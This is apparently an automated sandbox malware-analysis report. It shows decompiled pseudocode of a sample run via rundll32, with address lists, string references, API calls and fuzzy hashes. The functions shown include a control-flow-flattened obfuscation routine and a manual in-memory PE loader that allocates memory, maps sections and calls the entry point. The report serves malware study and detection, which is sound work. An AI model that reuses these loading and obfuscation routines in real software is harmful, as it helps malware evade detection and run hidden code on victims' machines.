						E00205FB2(_v540, _v556, _t244); // executed
						goto L13;
					}
					__eflags = _t214 - 0x382146c2;
					if(_t214 != 0x382146c2) {
						goto L22;
					}
					_t211 = E00202959(_t214, _v548, _v588, _v580, _v560); // executed
					_t244 = _t211;
					_t247 =  &(_t247[4]);
					__eflags = _t244;
					if(_t244 == 0) {
						_t214 = 0x3227b83a;
					} else {
						_t212 =  *0x21ca2c; // 0x495cc8
						 *((intOrPtr*)(_t212 + 0x224)) = 1;
						_t214 = 0x24baa30b;
					}
					goto L1;
					L22:
					__eflags = _t214 - 0xae4e76a;
				} while (_t214 != 0xae4e76a);
				L23:
				return _t245;
			}

0x00214b41
0x00214b47
0x00214b50
0x00214b54
0x00214b59
0x00214b5d
0x00214b64
0x00214b75
0x00214b79
0x00214b7b
0x00214b83
0x00214b91
0x00214b96
0x00214ba1
0x00214ba4
0x00214ba8
0x00214bad
0x00214bb5
0x00214bbd
0x00214bc2
0x00214bca
0x00214bd2
0x00214bda
0x00214be2
0x00214bea
0x00214bef
0x00214bf4
0x00214bfc
0x00214c04
0x00214c0c
0x00214c14
0x00214c1c
0x00214c2c
0x00214c30
0x00214c35
0x00214c3d
0x00214c45
0x00214c4d
0x00214c55
0x00214c5d
0x00214c6a
0x00214c6d
0x00214c71
0x00214c79
0x00214c81
0x00214c89
0x00214c91
0x00214c99
0x00214ca6
0x00214cb2
0x00214cb6
0x00214cbb
0x00214cc3
0x00214ccf
0x00214cd2
0x00214cd6
0x00214cde
0x00214ce6
0x00214cf7
0x00214d02
0x00214d06
0x00214d0e
0x00214d16
0x00214d1e
0x00214d26
0x00214d2e
0x00214d36
0x00214d3e
0x00214d46
0x00214d4e
0x00214d56
0x00214d5e
0x00214d66
0x00214d6e
0x00214d76
0x00214d7e
0x00214d8b
0x00214d8f
0x00214d97
0x00214d9f
0x00214da7
0x00214db2
0x00214db6
0x00214dba
0x00214dc2
0x00214dc2
0x00214dca
0x00214dca
0x00214dca
0x00214dca
0x00214dcc
0x00000000
0x00000000
0x00214dd2
0x00214e98
0x00214ea0
0x00214ea5
0x00214ea5
0x00214ea5
0x00214ead
0x00214eb2
0x00214ebc
0x00214ebc
0x00000000
0x00214ebc
0x00214dde
0x00214e69
0x00214e6a
0x00214e70
0x00214e75
0x00214e7c
0x00214e7e
0x00000000
0x00000000
0x00214e84
0x00214e8e
0x00000000
0x00214e8e
0x00214de6
0x00214e4e
0x00214e53
0x00000000
0x00214e53
0x00214dee
0x00214e2c
0x00214e34
0x00214e39
0x00214e41
0x00000000
0x00214e41
0x00214df2
0x00000000
0x00000000
0x00214df8
0x00214df9
0x00214e15
0x00214e1a
0x00214e1d
0x00214e26
0x00214e27
0x00214e27
0x00214ec3
0x00214ec9
0x00214f39
0x00214f4b
0x00214f50
0x00214f56
0x00214f59
0x00214f5f
0x00000000
0x00214f5f
0x00214ecb
0x00214ed1
0x00214f25
0x00000000
0x00214f2a
0x00214ed3
0x00214ed9
0x00000000
0x00000000
0x00214eef
0x00214ef4
0x00214ef6
0x00214ef9
0x00214efb
0x00214f15
0x00214efd
0x00214efd
0x00214f05
0x00214f0b
0x00214f0b
0x00000000
0x00214f64
0x00214f64
0x00214f64
0x00214f71
0x00214f7c

Strings

X, xrefs: 00214D6E
!yG, xrefs: 00214C79
Q, xrefs: 00214BB5
`=6, xrefs: 00214E34
o9, xrefs: 00214D7E
j, xrefs: 00214F64
8b, xrefs: 00214BF4
`=6, xrefs: 00214ECB
, xrefs: 00214CBB
j, xrefs: 00214F5F
,, xrefs: 00214E2C
x0, xrefs: 00214D9F

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
API String ID: 0-3958274775
Opcode ID: 7c739c396feb0e386aec4d0ff28d94465ad37d73e7f6475fe7003ac3f00bf9db
Instruction ID: 2ce02e64df4e44cfcfc8c4775516a17749ef582470d4fe809137607a50e4127a
Opcode Fuzzy Hash: 7c739c396feb0e386aec4d0ff28d94465ad37d73e7f6475fe7003ac3f00bf9db
Instruction Fuzzy Hash: 0BA177701183819FD358DF64D48A46BFBE1FBD4358F204A1DF19A962A0C7B88A99CF47

Uniqueness

Uniqueness Score: -1.00%

Function 1000288D, Relevance: 15.2, APIs: 10, Instructions: 209
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E1000288D(intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v44;
				char _v48;
				void* _t75;
				void* _t81;
				long _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				intOrPtr _t103;
				void* _t105;
				signed int _t110;
				void* _t113;
				void* _t116;
				intOrPtr* _t119;
				void* _t123;
				intOrPtr _t131;
				void* _t133;
				signed int _t135;
				intOrPtr* _t137;
				intOrPtr* _t138;
				signed int _t139;
				long _t142;
				long _t143;
				void* _t145;

				_v8 = _v8 & 0x00000000;
				_t144 = __ecx;
				_v12 = __ecx;
				if(E100023BA(_a8, 0x40) == 0) {
					L35:
					return 0;
				}
				_t138 = _a4;
				if( *_t138 != 0x5a4d) {
					L33:
					_push(0xc1);
					L34:
					SetLastError();
					goto L35;
				}
				if(E100023BA(_a8,  *((intOrPtr*)(_t138 + 0x3c)) + 0xf8) == 0) {
					goto L35;
				}
				_t119 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
				if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 4)) != 0x14c || ( *(_t119 + 0x38) & 0x00000001) != 0) {
					goto L33;
				} else {
					_t139 =  *(_t119 + 6) & 0x0000ffff;
					_t75 = ( *(_t119 + 0x14) & 0x0000ffff) + 0x24;
					if(_t139 == 0) {
						L10:
						_push( &_v48); // executed
						L10002CBC(); // executed
						_t122 = _v44;
						_t25 = _t122 - 1; // -1
						_t26 = _t122 - 1; // -1
						_t135 =  !_t25;
						_t142 = _t26 +  *((intOrPtr*)(_t119 + 0x50)) & _t135;
						if(_t142 != (_v8 - 0x00000001 + _v44 & _t135)) {
							goto L33;
						}
						_t81 = VirtualAlloc( *(_t119 + 0x34), _t142, 0x3000, 4); // executed
						_v8 = _t81;
						if(_t81 != 0) {
							L14:
							_t83 = HeapAlloc(GetProcessHeap(), 8, 0x34);
							_t123 = _v8;
							_t143 = _t83;
							if(_t143 != 0) {
								 *(_t143 + 4) = _t123;
								 *(_t143 + 0x14) = ( *(_t119 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
								 *((intOrPtr*)(_t143 + 0x1c)) = _a12;
								 *((intOrPtr*)(_t143 + 0x20)) = _a16;
								 *((intOrPtr*)(_t143 + 0x24)) = _a20;
								 *((intOrPtr*)(_t143 + 0x28)) = _a24;
								 *((intOrPtr*)(_t143 + 0x30)) = _v44;
								if(E100023BA(_a8,  *(_t119 + 0x54)) == 0) {
									L28:
									E100026C0(_t143);
									goto L35;
								}
								_t94 = VirtualAlloc(_v8,  *(_t119 + 0x54), 0x1000, 4); // executed
								_t145 = _t94;
								E10002C22(_t145, _a4,  *(_t119 + 0x54));
								_t97 =  *((intOrPtr*)(_a4 + 0x3c)) + _t145;
								_t144 = _v12;
								 *_t143 = _t97;
								 *((intOrPtr*)(_t97 + 0x34)) = _v8;
								_t98 = E100023D8(_v12, _a4, _a8, _t119, _t143); // executed
								if(_t98 == 0) {
									goto L28;
								}
								_t101 =  *((intOrPtr*)( *_t143 + 0x34)) ==  *(_t119 + 0x34);
								if( *((intOrPtr*)( *_t143 + 0x34)) ==  *(_t119 + 0x34)) {
									_t103 = 1;
								} else {
									_t103 = E10002B68(_t144, _t143, _t101);
								}
								 *((intOrPtr*)(_t143 + 0x18)) = _t103;
								if(E1000225B(_t143) != 0) {
									_t105 = E10002591(_t144, _t143); // executed
									if(_t105 != 0 && E100024BD(_t143) != 0) {
										_t131 =  *((intOrPtr*)( *_t143 + 0x28));
										if(_t131 == 0) {
											 *(_t143 + 0x2c) =  *(_t143 + 0x2c) & 0x00000000;
											L32:
											return _t143;
										}
										_t110 = _v8 + _t131;
										if( *(_t143 + 0x14) == 0) {
											 *(_t143 + 0x2c) = _t110;
											goto L32;
										}
										_push(0);
										_push(1);
										_push(0x10000000);
										if( *_t110() != 0) {
											 *((intOrPtr*)(_t143 + 0x10)) = 1;
											goto L32;
										}
										SetLastError(0x45a);
									}
								}
								goto L28;
							}
							VirtualFree(_t123, _t83, 0x8000);
							L13:
							_push(0xe);
							goto L34;
						}
						_t113 = VirtualAlloc(_t81, _t142, 0x3000, 4); // executed
						_v8 = _t113;
						if(_t113 != 0) {
							goto L14;
						}
						goto L13;
					}
					_t133 = _v8;
					_t137 = _t75 + _t119;
					do {
						_t115 =  !=  ?  *((void*)(_t137 + 4)) :  *(_t119 + 0x38);
						_t116 = ( !=  ?  *((void*)(_t137 + 4)) :  *(_t119 + 0x38)) +  *_t137;
						_t137 = _t137 + 0x28;
						_t117 =  <=  ? _t133 : _t116;
						_t133 =  <=  ? _t133 : _t116;
						_t139 = _t139 - 1;
					} while (_t139 != 0);
					_v8 = _t133;
					goto L10;
				}
			}

0x10002893
0x1000289f
0x100028a1
0x100028ab
0x10002ae5
0x00000000
0x10002ae5
0x100028b1
0x100028bc
0x10002ada
0x10002ada
0x10002adf
0x10002adf
0x00000000
0x10002adf
0x100028d7
0x00000000
0x00000000
0x100028e0
0x100028e8
0x00000000
0x10002907
0x1000290b
0x1000290f
0x10002914
0x1000293b
0x1000293e
0x1000293f
0x10002944
0x1000294d
0x10002950
0x10002953
0x1000295a
0x1000295e
0x00000000
0x00000000
0x1000296f
0x10002975
0x1000297a
0x10002999
0x100029a4
0x100029aa
0x100029ad
0x100029b1
0x100029c2
0x100029d1
0x100029d7
0x100029dd
0x100029e3
0x100029e9
0x100029ef
0x100029ff
0x10002aba
0x10002abd
0x00000000
0x10002abd
0x10002a12
0x10002a1b
0x10002a21
0x10002a33
0x10002a35
0x10002a3c
0x10002a3e
0x10002a44
0x10002a4b
0x00000000
0x00000000
0x10002a52
0x10002a55
0x10002a64
0x10002a57
0x10002a5b
0x10002a5b
0x10002a68
0x10002a72
0x10002a77
0x10002a7e
0x10002a8e
0x10002a93
0x10002ad2
0x10002ad6
0x00000000
0x10002ad6
0x10002a98
0x10002a9e
0x10002acd
0x00000000
0x10002acd
0x10002aa0
0x10002aa2
0x10002aa4
0x10002aad
0x10002ac4
0x00000000
0x10002ac4
0x10002ab4
0x10002ab4
0x10002a7e
0x00000000
0x10002a72
0x100029ba
0x10002992
0x10002992
0x00000000
0x10002992
0x10002985
0x1000298b
0x10002990
0x00000000
0x00000000
0x00000000
0x10002990
0x10002916
0x10002919
0x1000291c
0x10002923
0x10002927
0x10002929
0x1000292e
0x10002931
0x10002933
0x10002933
0x10002938
0x00000000
0x10002938

APIs

Part of subcall function 100023BA: SetLastError.KERNEL32(0000000D,?,100028A9,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49,10002B3B,00000000), ref: 100023C7

GetNativeSystemInfo.KERNEL32(10002857), ref: 1000293F
VirtualAlloc.KERNELBASE(?,?,00003000,00000004,10002159,?,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49), ref: 1000296F
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,10002159,00000000), ref: 10002985
GetProcessHeap.KERNEL32(00000008,00000034,?,10002159,00000000), ref: 1000299D
HeapAlloc.KERNEL32(00000000,?,10002159,00000000), ref: 100029A4
VirtualFree.KERNEL32(00000000,00000000,00008000,?,10002159,00000000), ref: 100029BA
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,10002159,?,?,10002159,00000000), ref: 10002A12
und_memcpy.LIBVCRUNTIME ref: 10002A21
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,10002159,00000000), ref: 10002AB4

Part of subcall function 100026C0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,10002AC2,00000000,10002159,?,?,10002159,00000000), ref: 10002726
Part of subcall function 100026C0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,10002AC2,00000000,10002159,?,?,10002159,00000000), ref: 1000272E
Part of subcall function 100026C0: HeapFree.KERNEL32(00000000,?,10002AC2), ref: 10002735

SetLastError.KERNEL32(000000C1,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49,10002B3B,00000000,?,10002159,00000000), ref: 10002ADF

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$AllocHeap$ErrorFreeLast$Process$InfoNativeSystemund_memcpy
String ID:
API String ID: 4093005746-0
Opcode ID: 0ab2a250ca3eac1d39a73b9ac0c12bbbcad5e6a5782c7eb362b19a931988e4eb
Instruction ID: d3499257f24b97b58dc88dd86fbd14561d56403c03c55b35f455527c3641d1ca
Opcode Fuzzy Hash: 0ab2a250ca3eac1d39a73b9ac0c12bbbcad5e6a5782c7eb362b19a931988e4eb
Instruction Fuzzy Hash: 4A71AA71700206AFEB15CF68CD80B59BBF5FF49784F118018E905DB68ADB74EA90CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00213895, Relevance: 12.8, Strings: 10, Instructions: 274
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00213895() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t281;
				intOrPtr _t284;
				void* _t286;
				void* _t290;
				void* _t294;
				void* _t295;
				char _t297;
				void* _t303;
				intOrPtr _t321;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int* _t331;

				_t331 =  &_v700;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t295 = 0x16120aa4;
				_v536 = 0x65127b;
				_v664 = 0x3b49;
				_v664 = _v664 << 5;
				_v664 = _v664 + 0x6a36;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x00000fa7;
				_v616 = 0x772f;
				_v616 = _v616 ^ 0x73b15b69;
				_v616 = _v616 ^ 0x73b12d46;
				_v604 = 0xe6c8;
				_v604 = _v604 + 0x8155;
				_v604 = _v604 ^ 0x000105e4;
				_v700 = 0xa5d;
				_v700 = _v700 * 0x52;
				_t294 = 0;
				_v700 = _v700 + 0xffffecf8;
				_t325 = 0x58;
				_v700 = _v700 * 0x66;
				_v700 = _v700 ^ 0x014b32de;
				_v684 = 0xc8e0;
				_v684 = _v684 + 0x308b;
				_v684 = _v684 + 0x2664;
				_v684 = _v684 >> 6;
				_v684 = _v684 ^ 0x00006abe;
				_v676 = 0x796a;
				_v676 = _v676 + 0xffff196c;
				_v676 = _v676 + 0xffffd40e;
				_v676 = _v676 ^ 0xd773f48b;
				_v676 = _v676 ^ 0x288ceae9;
				_v612 = 0x157c;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0x157c11c9;
				_v652 = 0xe7a2;
				_v652 = _v652 / _t325;
				_v652 = _v652 | 0x448e2e0d;
				_v652 = _v652 ^ 0x448e7eb8;
				_v640 = 0x3ee9;
				_v640 = _v640 * 0x5d;
				_v640 = _v640 >> 0xd;
				_v640 = _v640 ^ 0x0000282d;
				_v648 = 0xf425;
				_v648 = _v648 * 9;
				_v648 = _v648 >> 1;
				_v648 = _v648 ^ 0x0004354a;
				_v608 = 0x24ee;
				_v608 = _v608 + 0x809c;
				_v608 = _v608 ^ 0x0000fdeb;
				_v636 = 0x6dae;
				_v636 = _v636 + 0x1c44;
				_v636 = _v636 + 0x2b83;
				_v636 = _v636 ^ 0x0000a12d;
				_v656 = 0xe590;
				_v656 = _v656 >> 2;
				_v656 = _v656 << 7;
				_v656 = _v656 ^ 0x001cffcc;
				_v668 = 0xb9db;
				_v668 = _v668 >> 0xd;
				_v668 = _v668 + 0x89dd;
				_v668 = _v668 | 0xbce2fd3c;
				_v668 = _v668 ^ 0xbce2f9c6;
				_v596 = 0x1790;
				_v596 = _v596 + 0xffff27ec;
				_v596 = _v596 ^ 0xffff59a3;
				_v672 = 0xffb9;
				_v672 = _v672 + 0xffff618d;
				_v672 = _v672 >> 2;
				_t326 = 0x31;
				_v672 = _v672 * 0x75;
				_v672 = _v672 ^ 0x000b38e4;
				_v644 = 0xc4de;
				_v644 = _v644 + 0xbfb6;
				_v644 = _v644 ^ 0xc1434f22;
				_v644 = _v644 ^ 0xc142a5f5;
				_v680 = 0x8a5a;
				_v680 = _v680 | 0x8f6cf4f7;
				_v680 = _v680 + 0x838e;
				_v680 = _v680 + 0xffffa8f9;
				_v680 = _v680 ^ 0x8f6d4033;
				_v660 = 0xe8e2;
				_v660 = _v660 / _t326;
				_t327 = 0x25;
				_v660 = _v660 * 0x78;
				_v660 = _v660 ^ 0x000205be;
				_v688 = 0x9cd0;
				_v688 = _v688 + 0x8e7d;
				_v688 = _v688 * 0x26;
				_v688 = _v688 * 0x51;
				_v688 = _v688 ^ 0x0e0ecd55;
				_v620 = 0xe1b5;
				_v620 = _v620 / _t327;
				_v620 = _v620 ^ 0x00005557;
				_v696 = 0x769d;
				_v696 = _v696 >> 7;
				_v696 = _v696 | 0x5538ae99;
				_v696 = _v696 << 2;
				_v696 = _v696 ^ 0x54e2b31f;
				_v600 = 0xdcef;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x003705ca;
				_v624 = 0x48eb;
				_v624 = _v624 >> 0xd;
				_v624 = _v624 ^ 0x00002379;
				_v692 = 0xfa2c;
				_v692 = _v692 | 0x4759ecfd;
				_v692 = _v692 >> 0xc;
				_v692 = _v692 >> 9;
				_v692 = _v692 ^ 0x000062c4;
				_v632 = 0xbcd9;
				_v632 = _v632 << 4;
				_v632 = _v632 | 0x68c1d353;
				_v632 = _v632 ^ 0x68cbf855;
				_v628 = 0x848;
				_t328 = 0x1c;
				_v628 = _v628 / _t328;
				_v628 = _v628 ^ 0x00001dd4;
				_t324 = _v628;
				_v592 = 0xa720;
				_v592 = _v592 + 0xffff9569;
				_v592 = _v592 ^ 0x00003c8a;
				do {
					while(_t295 != 0x2b0230e) {
						if(_t295 == 0x16120aa4) {
							_t295 = 0x182cddf3;
							continue;
						} else {
							if(_t295 == 0x182cddf3) {
								E0021AAAE(_v604, _v700, _v684,  &_v588, _v676);
								_t331 =  &(_t331[3]);
								_t295 = 0x2f4d7b3a;
								continue;
							} else {
								if(_t295 == 0x1c4d16fa) {
									_t284 = _v584;
									_t297 = _v588;
									_v548 = _v548 & 0x00000000;
									_v576 = _t284;
									_v568 = _t284;
									_v560 = _t284;
									_v552 = _t284;
									_v580 = _t297;
									_v572 = _t297;
									_v564 = _t297;
									_v556 = _t297;
									_t286 = E0020B6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
									_t331 =  &(_t331[5]);
									__eflags = _t286;
									_t294 =  !=  ? 1 : _t294;
									_t295 = 0x2a39a402;
									continue;
								} else {
									if(_t295 == 0x2a39a402) {
										E00214F7D(_v632, _v628, _t324); // executed
									} else {
										if(_t295 == 0x2f4d7b3a) {
											_v588 = _v588 - E0020F46D();
											_t295 = 0x369a1b5f;
											asm("sbb [esp+0x84], edx");
											continue;
										} else {
											_t339 = _t295 - 0x369a1b5f;
											if(_t295 != 0x369a1b5f) {
												goto L16;
											} else {
												_push(_v652);
												_t290 = E0021889D(0x21c9b0, _v612, _t339);
												_pop(_t303);
												_t321 =  *0x21ca2c; // 0x495cc8
												_t224 = _t321 + 0x230; // 0x660053
												E0020C680(_t224, _v648, _v608, _t303, _v636,  *0x21ca2c, _t290,  &_v524);
												_t331 =  &(_t331[7]);
												E00212025(_v656, _t290, _v668, _v596);
												_t295 = 0x2b0230e;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t294;
					}
					_t281 = E0020B566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
					_t324 = _t281;
					_t331 =  &(_t331[0xc]);
					__eflags = _t281 - 0xffffffff;
					if(__eflags == 0) {
						_t295 = 0x1d984ba2;
						goto L16;
					} else {
						_t295 = 0x1c4d16fa;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t295 - 0x1d984ba2;
				} while (__eflags != 0);
				goto L19;
			}

0x00213895
0x0021389b
0x002138a5
0x002138ad
0x002138b2
0x002138bd
0x002138c5
0x002138ca
0x002138d2
0x002138d7
0x002138df
0x002138e7
0x002138ef
0x002138f7
0x002138ff
0x00213907
0x0021390f
0x0021391e
0x00213922
0x00213924
0x00213933
0x00213934
0x00213938
0x00213940
0x00213948
0x00213950
0x00213958
0x0021395d
0x00213965
0x0021396d
0x00213975
0x0021397d
0x00213985
0x0021398d
0x00213995
0x0021399a
0x002139a2
0x002139b0
0x002139b4
0x002139bc
0x002139c4
0x002139d1
0x002139d5
0x002139da
0x002139e2
0x002139ef
0x002139f3
0x002139f7
0x002139ff
0x00213a07
0x00213a0f
0x00213a17
0x00213a1f
0x00213a27
0x00213a2f
0x00213a37
0x00213a3f
0x00213a44
0x00213a49
0x00213a51
0x00213a59
0x00213a5e
0x00213a66
0x00213a6e
0x00213a76
0x00213a7e
0x00213a86
0x00213a8e
0x00213a96
0x00213a9e
0x00213aac
0x00213ab4
0x00213ab8
0x00213ac0
0x00213ac8
0x00213ad0
0x00213ad8
0x00213ae0
0x00213ae8
0x00213af0
0x00213af8
0x00213b00
0x00213b08
0x00213b18
0x00213b21
0x00213b24
0x00213b28
0x00213b30
0x00213b38
0x00213b45
0x00213b4e
0x00213b52
0x00213b5a
0x00213b6a
0x00213b6e
0x00213b76
0x00213b7e
0x00213b83
0x00213b8b
0x00213b90
0x00213b98
0x00213ba0
0x00213ba5
0x00213bad
0x00213bb5
0x00213bba
0x00213bc2
0x00213bca
0x00213bd2
0x00213bd7
0x00213bdc
0x00213be4
0x00213bec
0x00213bf1
0x00213bf9
0x00213c01
0x00213c0d
0x00213c10
0x00213c14
0x00213c1c
0x00213c20
0x00213c28
0x00213c30
0x00213c38
0x00213c38
0x00213c4a
0x00213db7
0x00000000
0x00213c50
0x00213c52
0x00213da5
0x00213daa
0x00213dad
0x00000000
0x00213c58
0x00213c5e
0x00213d0c
0x00213d17
0x00213d1e
0x00213d26
0x00213d2d
0x00213d34
0x00213d3b
0x00213d57
0x00213d5e
0x00213d65
0x00213d6c
0x00213d73
0x00213d7a
0x00213d7e
0x00213d80
0x00213d83
0x00000000
0x00213c64
0x00213c6a
0x00213e2c
0x00213c70
0x00213c76
0x00213cf4
0x00213cfb
0x00213d00
0x00000000
0x00213c78
0x00213c78
0x00213c7e
0x00000000
0x00213c84
0x00213c84
0x00213c91
0x00213c96
0x00213cb8
0x00213cc2
0x00213cc8
0x00213ccd
0x00213cde
0x00213ce5
0x00000000
0x00213ce5
0x00213c7e
0x00213c76
0x00213c6a
0x00213c5e
0x00213c52
0x00213e35
0x00213e3e
0x00213e3e
0x00213df7
0x00213dfc
0x00213dfe
0x00213e01
0x00213e04
0x00213e10
0x00000000
0x00213e06
0x00213e06
0x00000000
0x00213e06
0x00000000
0x00213e15
0x00213e15
0x00213e15
0x00000000

Strings

WU, xrefs: 00213B6E
:{M/, xrefs: 00213C70
:{M/, xrefs: 00213DAD
$, xrefs: 002139FF
6j, xrefs: 002138CA
-(, xrefs: 002139DA
y#, xrefs: 00213BBA
/w, xrefs: 002138DF
jy, xrefs: 00213965
d&, xrefs: 00213950

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: -($/w$6j$:{M/$:{M/$WU$d&$jy$y#$$
API String ID: 2962429428-1089002639
Opcode ID: 298b4e55ca66e97773e55173aceeb38b64466df3d9d673d2282fa57a74fb47f7
Instruction ID: eb563e8dcb3207c93ce65352c844c24a57e48b334ffc03c5ce1e9b57ca15f1f3
Opcode Fuzzy Hash: 298b4e55ca66e97773e55173aceeb38b64466df3d9d673d2282fa57a74fb47f7
Instruction Fuzzy Hash: 26D110715183819FE368CF61C489A5BFBE1BBD4318F108A1DF1DA862A0D7B98959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002142DA, Relevance: 7.9, Strings: 6, Instructions: 373
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E002142DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t336;
				intOrPtr _t357;
				intOrPtr _t361;
				void* _t365;
				signed int _t368;
				intOrPtr _t379;
				intOrPtr _t380;
				void* _t413;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				intOrPtr* _t428;
				signed int _t431;
				signed int* _t437;
				void* _t439;

				_t380 = __ecx;
				_push(_a16);
				_v148 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t336);
				_v32 = 0x4bc1;
				_t437 =  &(( &_v172)[6]);
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000002f8;
				_t379 = 0;
				_v168 = 0xbc3a;
				_t431 = 0x3b64c246;
				_v168 = _v168 >> 0xa;
				_t435 = 0;
				_v168 = _v168 << 1;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x0000918a;
				_v96 = 0x296c;
				_v96 = _v96 ^ 0xfe254c59;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x0001a08f;
				_v52 = 0x7e94;
				_v52 = _v52 + 0xffff276a;
				_v52 = _v52 ^ 0xffffb392;
				_v156 = 0x71e;
				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x91e5be42;
				_v156 = _v156 | 0xf592e812;
				_v156 = _v156 ^ 0xf5fb9c3d;
				_v60 = 0xbf5e;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x00001130;
				_v112 = 0x687f;
				_v112 = _v112 | 0xf46ca00f;
				_t421 = 0x35;
				_v112 = _v112 * 0x78;
				_v112 = _v112 ^ 0x930cd2b7;
				_v152 = 0xc857;
				_v152 = _v152 << 5;
				_v152 = _v152 | 0x37c6acdc;
				_v152 = _v152 + 0xffffd100;
				_v152 = _v152 ^ 0x37df0477;
				_v144 = 0xf477;
				_v144 = _v144 >> 2;
				_v144 = _v144 << 5;
				_v144 = _v144 | 0xf3531cc7;
				_v144 = _v144 ^ 0xf357d736;
				_v120 = 0xcb9;
				_v120 = _v120 + 0xe3f9;
				_v120 = _v120 ^ 0x6ced8dd9;
				_v120 = _v120 ^ 0x6ced4b8c;
				_v20 = 0x5e2b;
				_v20 = _v20 + 0xffff1e4f;
				_v20 = _v20 ^ 0xffff4ba5;
				_v124 = 0x4b0e;
				_v124 = _v124 / _t421;
				_t422 = 0x44;
				_v124 = _v124 / _t422;
				_v124 = _v124 ^ 0x00000f50;
				_v92 = 0x1f74;
